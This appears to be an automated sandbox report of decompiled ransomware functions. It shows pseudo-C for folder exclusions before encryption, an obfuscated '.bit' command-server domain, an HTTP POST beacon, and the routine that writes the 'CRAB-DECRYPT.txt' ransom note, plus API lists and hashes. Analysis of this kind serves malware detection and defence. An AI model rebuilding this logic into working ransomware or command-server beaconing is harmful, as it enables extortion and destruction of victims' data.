String ID: i)w$CRAB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
API String ID: 203586893-739155506
Opcode ID: 3b1154fdaae42e0514b1dc947d1580bd14000208d25efafdcf74f00b8058e6b7
Instruction ID: cd6451f024e767dec442da0242c67cd43a98bdaaad60d562859ccd19e01c8704
Opcode Fuzzy Hash: 3b1154fdaae42e0514b1dc947d1580bd14000208d25efafdcf74f00b8058e6b7
Instruction Fuzzy Hash: DB11CE627806A6755B20367DAD01EEF13CCBDD6F90385023AF904F2083EB99EE1384B5

Uniqueness

Uniqueness Score: -1.00%

Function 0F586780 Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 124
memoryCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E0F586780(void* __ecx) {
				void* _t12;
				intOrPtr* _t23;
				void* _t51;
				void* _t52;

				_t52 = __ecx;
				_t51 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
				if(E0F5881F0(_t52, L"\\ProgramData\\") != 0 || E0F5881F0(_t52, L"\\IETldCache\\") != 0 || E0F5881F0(_t52, L"\\Boot\\") != 0 || E0F5881F0(_t52, L"\\Program Files\\") != 0 || E0F5881F0(_t52, L"\\Tor Browser\\") != 0 || E0F5881F0(_t52, L"Ransomware") != 0 || E0F5881F0(_t52, L"\\All Users\\") != 0 || E0F5881F0(_t52, L"\\Local Settings\\") != 0) {
					L18:
					VirtualFree(_t51, 0, 0x8000);
					return 0;
				} else {
					_t12 = E0F5881F0(_t52, L"\\Windows\\");
					if(_t12 != 0) {
						goto L18;
					} else {
						_t23 = __imp__SHGetSpecialFolderPathW;
						_push(_t12);
						_push(0x2a);
						_push(_t51);
						_push(_t12);
						if( *_t23() == 0 || E0F5881F0(_t52, _t51) == 0) {
							_push(0);
							_push(0x2b);
							_push(_t51);
							_push(0);
							if( *_t23() == 0 || E0F5881F0(_t52, _t51) == 0) {
								_push(0);
								_push(0x24);
								_push(_t51);
								_push(0);
								if( *_t23() == 0 || E0F5881F0(_t52, _t51) == 0) {
									_push(0);
									_push(0x1c);
									_push(_t51);
									_push(0);
									if( *_t23() == 0 || E0F5881F0(_t52, _t51) == 0) {
										VirtualFree(_t51, 0, 0x8000);
										return 1;
									} else {
										goto L18;
									}
								} else {
									goto L18;
								}
							} else {
								goto L18;
							}
						} else {
							goto L18;
						}
					}
				}
			}

0x0f586791
0x0f5867a0
0x0f5867a9
0x0f5868d4
0x0f5868dd
0x0f5868e8
0x0f58683b
0x0f586842
0x0f586849
0x00000000
0x0f58684f
0x0f58684f
0x0f586855
0x0f586856
0x0f586858
0x0f586859
0x0f58685e
0x0f58686d
0x0f58686f
0x0f586871
0x0f586872
0x0f586878
0x0f586887
0x0f586889
0x0f58688b
0x0f58688c
0x0f586892
0x0f5868a1
0x0f5868a3
0x0f5868a5
0x0f5868a6
0x0f5868ac
0x0f5868c8
0x0f5868d3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0f58685e
0x0f586849

APIs

VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F586E06,00000000,?,?), ref: 0F586793
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F586E06,00000000,?,?), ref: 0F58685A
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F586E06,00000000,?,?), ref: 0F586874
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F586E06,00000000,?,?), ref: 0F58688E
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F586E06,00000000,?,?), ref: 0F5868A8
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F586E06,00000000,?,?), ref: 0F5868C8
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F586E06,00000000,?,?), ref: 0F5868DD

Strings

Ransomware, xrefs: 0F5867FF
\Program Files\, xrefs: 0F5867D7
\Tor Browser\, xrefs: 0F5867EB
\Local Settings\, xrefs: 0F586827
\Windows\, xrefs: 0F58683B
\ProgramData\, xrefs: 0F586799
\IETldCache\, xrefs: 0F5867AF
\Boot\, xrefs: 0F5867C3
\All Users\, xrefs: 0F586813

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: FolderPathSpecial$Virtual$Free$Alloc
String ID: Ransomware$\All Users\$\Boot\$\IETldCache\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\$\Windows\
API String ID: 1363212851-3735464813
Opcode ID: 12619a8fe19732222dd493198db7ad9a0c3e6e1636b14e5343d4320dd0b6aeef
Instruction ID: 39386b1874398073fcb3d2cddaedfcb22535d72e04910fdab950d4ea3d1c13d8
Opcode Fuzzy Hash: 12619a8fe19732222dd493198db7ad9a0c3e6e1636b14e5343d4320dd0b6aeef
Instruction Fuzzy Hash: 1531E12074076222EA6432660D55B2F4BDAABD9E56F914035AA05FF2C2EF58DC0387A9

Uniqueness

Uniqueness Score: -1.00%

Function 0F585220 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 91
memorystringsleepCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0F585220() {
				WCHAR* _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				short _v40;
				char _v56;
				short _v60;
				intOrPtr _v64;
				char _v80;
				WCHAR* _t26;
				intOrPtr _t27;
				long _t32;
				WCHAR* _t37;
				void* _t39;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				void* _t48;
				WCHAR* _t49;
				void* _t52;
				void* _t53;

				asm("movdqa xmm0, [0xf590540]");
				_v36 =  &_v56;
				asm("movdqu [ebp-0x34], xmm0");
				_v32 =  &_v80;
				asm("movdqa xmm0, [0xf590520]");
				_v40 = 0x74;
				asm("movdqu [ebp-0x4c], xmm0");
				_v64 = 0x69622e6d;
				_v60 = 0x74;
				_v24 = 0x62636467;
				_v20 = 0x7469622e;
				_v16 = 0;
				_v28 =  &_v24;
				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
				_t37 = _t26;
				_v8 = _t37;
				if(_t37 != 0) {
					_t40 = 0;
					_t48 = 1;
					_t45 = 0;
					while(1) {
						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x20));
						_t45 = _t45 + 1;
						_v12 = _t27;
						if(_t45 == 3) {
							asm("sbb esi, esi");
							_t48 =  ~(_t48 - 1) + 2;
							_t45 = 0;
						}
						if(_t40 == 0xffffffff) {
							Sleep(0x3e8);
						}
						_t39 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4);
						_t41 = _t39;
						E0F585060(_t41, _v12, _t48);
						_t53 = _t53 + 4;
						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
						if(_t32 != 0) {
							break;
						}
						VirtualFree(_t39, _t32, 0x8000);
						_t37 = _v8;
						_t40 = _t41 | 0xffffffff;
					}
					_t49 = _v8;
					wsprintfW(_t49, L"%S", _t39);
					VirtualFree(_t39, 0, 0x8000);
					_t26 = _t49;
				}
				return _t26;
			}

0x0f585226
0x0f585236
0x0f585241
0x0f585246
0x0f58524c
0x0f58525b
0x0f585261
0x0f585266
0x0f58526d
0x0f585273
0x0f58527a
0x0f585281
0x0f585285
0x0f585288
0x0f58528e
0x0f585290
0x0f585295
0x0f58529b
0x0f58529d
0x0f5852a2
0x0f5852a4
0x0f5852a4
0x0f5852a8
0x0f5852a9
0x0f5852af
0x0f5852b4
0x0f5852b6
0x0f5852b9
0x0f5852b9
0x0f5852be
0x0f5852c5
0x0f5852c5
0x0f5852ec
0x0f5852ef
0x0f5852f1
0x0f5852f6
0x0f5852ff
0x0f585307
0x00000000
0x00000000
0x0f585310
0x0f585316
0x0f585319
0x0f585319
0x0f58531e
0x0f585328
0x0f585339
0x0f58533f
0x0f58533f
0x0f585347

APIs

VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0F585288
Sleep.KERNEL32(000003E8), ref: 0F5852C5
lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F5852D3
VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F5852E3
lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F5852FF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F585310
wsprintfW.USER32 ref: 0F585328
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F585339

Strings

.bit, xrefs: 0F58527A
gdcb, xrefs: 0F585273
m.bi, xrefs: 0F585266
t, xrefs: 0F58526D
t, xrefs: 0F58525B
fabian wosar <3, xrefs: 0F5852F9

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
String ID: .bit$fabian wosar <3$gdcb$m.bi$t$t
API String ID: 2709691373-2847225850
Opcode ID: d1825d586f8624f3901625524a622172895362234e77ec1b0802ca379dd5396a
Instruction ID: a837bf1f86855d84c932208a36c83e99dd261ff7a176a6722088736031e62322
Opcode Fuzzy Hash: d1825d586f8624f3901625524a622172895362234e77ec1b0802ca379dd5396a
Instruction Fuzzy Hash: E431EB71E00309E7DB00DFA4DD85BEE7BB8FF44721F101125F605B6281EB745A068B94

Uniqueness

Uniqueness Score: -1.00%

Function 0F5854F0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 117
stringmemorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E0F5854F0(CHAR* __ecx, CHAR** __edx, intOrPtr _a8) {
				void* _v8;
				CHAR* _v12;
				void* _v16;
				CHAR** _v20;
				void* _v24;
				char _v28;
				short _v124;
				void* _t40;
				CHAR* _t44;
				CHAR* _t46;
				void* _t47;
				void* _t55;
				void* _t56;
				CHAR* _t58;
				void* _t59;

				_t46 = __ecx;
				_v20 = __edx;
				_v12 = __ecx;
				E0F587E40( &_v28);
				_v16 = E0F585220();
				_t55 = 0x400 + lstrlenA(_t46) * 2;
				_t7 = _t55 + 1; // 0x1
				_t47 = VirtualAlloc(0, _t7, 0x3000, 0x40);
				_v8 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
				if(_t47 == 0) {
					L3:
					_t58 = 0;
					L4:
					lstrcatA(_t58, _v12);
					asm("movdqu xmm0, [0xf58fb40]");
					asm("movdqu [ebp-0x78], xmm0");
					asm("movdqu xmm0, [0xf58fb50]");
					asm("movdqu [ebp-0x68], xmm0");
					asm("movdqu xmm0, [0xf58fb60]");
					asm("movdqu [ebp-0x58], xmm0");
					asm("movdqu xmm0, [0xf58fb70]");
					asm("movdqu [ebp-0x48], xmm0");
					asm("movdqu xmm0, [0xf58fb80]");
					asm("movdqu [ebp-0x38], xmm0");
					asm("movdqu xmm0, [0xf58fb90]");
					asm("movdqu [ebp-0x28], xmm0");
					lstrlenA(_t58);
					_t56 = 0;
					_push(lstrlenW( &_v124));
					_push( &_v124);
					_push(L"POST");
					_push(0x31fff);
					_push(_v8);
					_push(lstrlenA(_t58));
					_push(_t58);
					_t59 = _v16;
					_push(L"popkadurak");
					_push(_t59);
					if(E0F588050( &_v28) != 0) {
						_t56 = 1;
						if(_a8 != 0) {
							_v12 = 0;
							if(E0F5853D0(_v8,  &_v12) == 0) {
								_t56 = 0;
							} else {
								_t44 = _v12;
								if(_t44 != 0) {
									 *_v20 = _t44;
								}
							}
						}
					}
					VirtualFree(_t59, 0, 0x8000);
					VirtualFree(_v8, 0, 0x8000);
					VirtualFree(_t47, 0, 0x8000);
					_t40 = _v24;
					if(_t40 != 0) {
						InternetCloseHandle(_t40);
					}
					return _t56;
				}
				_t9 = _t55 + 1; // 0x1
				if(_t55 >= _t9) {
					goto L3;
				} else {
					_t58 = _t47;
					goto L4;
				}
			}

0x0f5854f8
0x0f5854fa
0x0f585501
0x0f585504
0x0f58550f
0x0f585525
0x0f58552c
0x0f585542
0x0f585546
0x0f58554b
0x0f585558
0x0f585558
0x0f58555a
0x0f58555e
0x0f585564
0x0f58556d
0x0f585572
0x0f58557a
0x0f58557f
0x0f585587
0x0f58558c
0x0f585594
0x0f585599
0x0f5855a1
0x0f5855a6
0x0f5855ae
0x0f5855b3
0x0f5855bc
0x0f5855c5
0x0f5855c9
0x0f5855ca
0x0f5855d2
0x0f5855d7
0x0f5855e1
0x0f5855e2
0x0f5855e3
0x0f5855e9
0x0f5855ee
0x0f5855f6
0x0f5855fc
0x0f585601
0x0f585609
0x0f585617
0x0f585627
0x0f585619
0x0f585619
0x0f58561e
0x0f585623
0x0f585623
0x0f58561e
0x0f585617
0x0f585601
0x0f585637
0x0f585643
0x0f58564d
0x0f58564f
0x0f585654
0x0f585657
0x0f585657
0x0f585665
0x0f585665
0x0f58554d
0x0f585552
0x00000000
0x0f585554
0x0f585554
0x00000000
0x0f585554

APIs

Part of subcall function 0F587E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F588024
Part of subcall function 0F587E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F58803D

Part of subcall function 0F585220: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0F585288
Part of subcall function 0F585220: Sleep.KERNEL32(000003E8), ref: 0F5852C5
Part of subcall function 0F585220: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F5852D3
Part of subcall function 0F585220: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F5852E3
Part of subcall function 0F585220: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F5852FF
Part of subcall function 0F585220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F585310
Part of subcall function 0F585220: wsprintfW.USER32 ref: 0F585328
Part of subcall function 0F585220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F585339

lstrlenA.KERNEL32(00000000,00000000,00000000,77296980), ref: 0F585512
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F585532
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F585544
lstrcatA.KERNEL32(00000000,?), ref: 0F58555E
lstrlenA.KERNEL32(00000000), ref: 0F5855B3
lstrlenW.KERNEL32(?), ref: 0F5855BF
lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0F5855DB
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F585637
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F585643
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F58564D
InternetCloseHandle.WININET(0F58581B), ref: 0F585657

Strings

POST, xrefs: 0F5855CA
popkadurak, xrefs: 0F5855E9

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Internet$Open$CloseHandleSleeplstrcatlstrcmpiwsprintf
String ID: POST$popkadurak
API String ID: 2554059081-2707760125
Opcode ID: 50375dacfd9a6222f4df5dfab2ccfa4eaa25df01561a5e83a441bb6f1c2db1fc
Instruction ID: 7427cf842f480294e08547429d7791379471136cf6f5da861cba3b359e4b6d84
Opcode Fuzzy Hash: 50375dacfd9a6222f4df5dfab2ccfa4eaa25df01561a5e83a441bb6f1c2db1fc
Instruction Fuzzy Hash: 7D41C671E0030AE6EB10AFA9DD41FED7F79FF88721F141125EA40B2241EB78564ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 0F5872A0 Relevance: 20.1, APIs: 16, Instructions: 120
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0F5872A0(intOrPtr* __ecx) {
				int _t42;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t70;
				int _t72;
				void* _t75;
				intOrPtr* _t86;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;
				int _t93;
				int _t94;
				void* _t95;

				_t40 = lstrlenW;
				_t86 = __ecx;
				_t75 = 0;
				if( *__ecx != 0) {
					_t72 = lstrlenW( *(__ecx + 8));
					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
					_t40 = lstrlenW;
					_t75 = _t3 + _t72;
				}
				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
					_t70 = lstrlenW( *(_t86 + 0x10));
					_t7 = _t95 + 4; // 0x4
					_t75 = _t7 + _t70 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
					_t94 = lstrlenW( *(_t86 + 0x20));
					_t66 = lstrlenW( *(_t86 + 0x1c));
					_t11 = _t94 + 4; // 0x4
					_t75 = _t11 + _t66 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
					_t93 = lstrlenW( *(_t86 + 0x2c));
					_t63 = lstrlenW( *(_t86 + 0x28));
					_t15 = _t93 + 4; // 0x4
					_t75 = _t15 + _t63 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
					_t92 = lstrlenW( *(_t86 + 0x38));
					_t60 = lstrlenW( *(_t86 + 0x34));
					_t19 = _t92 + 4; // 0x4
					_t75 = _t19 + _t60 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
					_t91 = lstrlenW( *(_t86 + 0x44));
					_t57 = lstrlenW( *(_t86 + 0x40));
					_t23 = _t91 + 4; // 0x4
					_t75 = _t23 + _t57 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
					_t90 = lstrlenW( *(_t86 + 0x50));
					_t54 = lstrlenW( *(_t86 + 0x4c));
					_t27 = _t90 + 4; // 0x4
					_t75 = _t27 + _t54 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
					_t89 = lstrlenW( *(_t86 + 0x5c));
					_t51 = lstrlenW( *(_t86 + 0x58));
					_t31 = _t89 + 4; // 0x4
					_t75 = _t31 + _t51 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
					_t75 = _t75 + 0x14;
				}
				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
					_t88 = lstrlenW( *(_t86 + 0x7c));
					_t48 = lstrlenW( *(_t86 + 0x78));
					_t36 = _t88 + 4; // 0x4
					_t75 = _t36 + _t48 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
					return _t75;
				} else {
					_t42 = lstrlenW( *(_t86 + 0x88));
					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
				}
			}

0x0f5872a0
0x0f5872a8
0x0f5872aa
0x0f5872ae
0x0f5872b3
0x0f5872c1
0x0f5872c4
0x0f5872c9
0x0f5872c9
0x0f5872cf
0x0f5872d9
0x0f5872e0
0x0f5872e4
0x0f5872e7
0x0f5872e7
0x0f5872ed
0x0f5872fb
0x0f5872fd
0x0f587305
0x0f587308
0x0f587308
0x0f58730e
0x0f58731c
0x0f58731e
0x0f587326
0x0f587329
0x0f587329
0x0f58732f
0x0f58733d
0x0f58733f
0x0f587347
0x0f58734a
0x0f58734a
0x0f587350
0x0f58735e
0x0f587360
0x0f587368
0x0f58736b
0x0f58736b
0x0f587371
0x0f58737f
0x0f587381
0x0f587389
0x0f58738c
0x0f58738c
0x0f587392
0x0f5873a0
0x0f5873a2
0x0f5873aa
0x0f5873ad
0x0f5873ad
0x0f5873b3
0x0f5873b5
0x0f5873b5
0x0f5873bc
0x0f5873ca
0x0f5873cc
0x0f5873d4
0x0f5873d7
0x0f5873d7
0x0f5873e0
0x0f58740c
0x0f5873e2
0x0f5873e8
0x0f587406
0x0f587406

APIs

lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872F2
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872FD
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587313
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58731E
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587334
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58733F
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587355
lstrlenW.KERNEL32(0F584B36,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587360
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587376
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587381
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587397
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873A2
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873C1
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873CC
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873E8
lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873F6

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 00a347930c613ccbb0d5350d7b6b2600b92491161b27efa0141adc65906399c2
Instruction ID: 5e1af2344e6d4b3c2a48226344ad4df0a39555e05da5ee398a47357ec6d8bdd6
Opcode Fuzzy Hash: 00a347930c613ccbb0d5350d7b6b2600b92491161b27efa0141adc65906399c2
Instruction Fuzzy Hash: 5F412232100612FFD7115FA8EE8C794BBA1FF08316F185535E416B2621D779B47AEB81

Uniqueness

Uniqueness Score: -1.00%

Function 0F585F00 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 66
stringmemorylibraryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0F585F00(void* __ecx, intOrPtr __edx, void* __esi) {
				CHAR* _v8;
				intOrPtr _v12;
				char _v267;
				char _v268;
				CHAR* _t10;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t20;
				void* _t24;
				void* _t31;
				void* _t35;

				_t10 =  *0xf592a78; // 0x0
				_v12 = __edx;
				_t24 = __ecx;
				_v8 = _t10;
				_t31 = VirtualAlloc(0, 0xa, 0x3000, 4);
				if(_t31 != 0) {
					_t13 = GetModuleHandleA("ntdll.dll");
					if(_t13 != 0) {
						_t20 = GetProcAddress(_t13, "RtlComputeCrc32");
						wsprintfA(_t31, "%Xeuropol",  *_t20(0x29a, _v8, lstrlenA(_v8), __esi));
						_t35 = _t35 + 0xc;
					}
					_v268 = 0;
					E0F589170( &_v267, 0, 0xff);
					E0F585DC0( &_v268, _t31, lstrlenA(_t31));
					E0F585E70( &_v268, _t24, _v12);
					VirtualFree(_t31, 0, 0x8000);
				}
				return _t24;
			}

0x0f585f09
0x0f585f1b
0x0f585f1e
0x0f585f20
0x0f585f29
0x0f585f2d
0x0f585f38
0x0f585f40
0x0f585f49
0x0f585f6c
0x0f585f72
0x0f585f75
0x0f585f81
0x0f585f8b
0x0f585fa3
0x0f585fb3
0x0f585fc3
0x0f585fc3
0x0f585fd0

APIs

VirtualAlloc.KERNEL32(00000000,0000000A,00003000,00000004,00000000,00000000), ref: 0F585F23
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 0F585F38
GetProcAddress.KERNEL32(00000000,RtlComputeCrc32,772966A0), ref: 0F585F49
lstrlenA.KERNEL32(00000000), ref: 0F585F54
wsprintfA.USER32 ref: 0F585F6C
_memset.LIBCMT ref: 0F585F8B
lstrlenA.KERNEL32(00000000), ref: 0F585F94
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F585FC3

Strings

%Xeuropol, xrefs: 0F585F66
RtlComputeCrc32, xrefs: 0F585F43
ntdll.dll, xrefs: 0F585F33

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtuallstrlen$AddressAllocFreeHandleModuleProc_memsetwsprintf
String ID: %Xeuropol$RtlComputeCrc32$ntdll.dll
API String ID: 218840185-1387466253
Opcode ID: 095d2baa008bff8b64c7b411bb2640eb984a81ce6e6929caf4b2f3e1458ca378
Instruction ID: 385a465960556f8941655574efeaa2c36689c4abeb750ef906f7080a655123ff
Opcode Fuzzy Hash: 095d2baa008bff8b64c7b411bb2640eb984a81ce6e6929caf4b2f3e1458ca378
Instruction Fuzzy Hash: 3B113435E44304BBD7206B68ED49FAE7F78BB44B21F040075F905F2281EBB85A57AA51

Uniqueness

Uniqueness Score: -1.00%

Function 0F586D40 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F586D40(void* __ecx) {
				long _v8;
				WCHAR* _t7;
				signed int _t16;
				void* _t21;
				void* _t22;
				void* _t25;

				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
				wsprintfW(_t25, L"%s\\CRAB-DECRYPT.txt", _t21);
				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t7 =  *0xf592a64; // 0xf592000
					if(_t7 != 0) {
						WriteFile(_t22,  *0xf592a64, lstrlenW(_t7) + _t11,  &_v8, 0);
					}
					CloseHandle(_t22);
					_t16 = 1;
				} else {
					_t16 = 0 | GetLastError() == 0x000000b7;
				}
				VirtualFree(_t25, 0, 0x8000);
				return _t16;
			}

0x0f586d5b
0x0f586d63
0x0f586d85
0x0f586d8a
0x0f586d9e
0x0f586da5
0x0f586dbe
0x0f586dbe
0x0f586dc5
0x0f586dcb
0x0f586d8c
0x0f586d99
0x0f586d99
0x0f586dd8
0x0f586de6

APIs

VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F586E22,00000000,?,?), ref: 0F586D55
wsprintfW.USER32 ref: 0F586D63
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F586D7F
GetLastError.KERNEL32(?,?), ref: 0F586D8C
lstrlenW.KERNEL32(0F592000,?,00000000,?,?), ref: 0F586DAE
WriteFile.KERNEL32(00000000,00000000,?,?), ref: 0F586DBE
CloseHandle.KERNEL32(00000000,?,?), ref: 0F586DC5
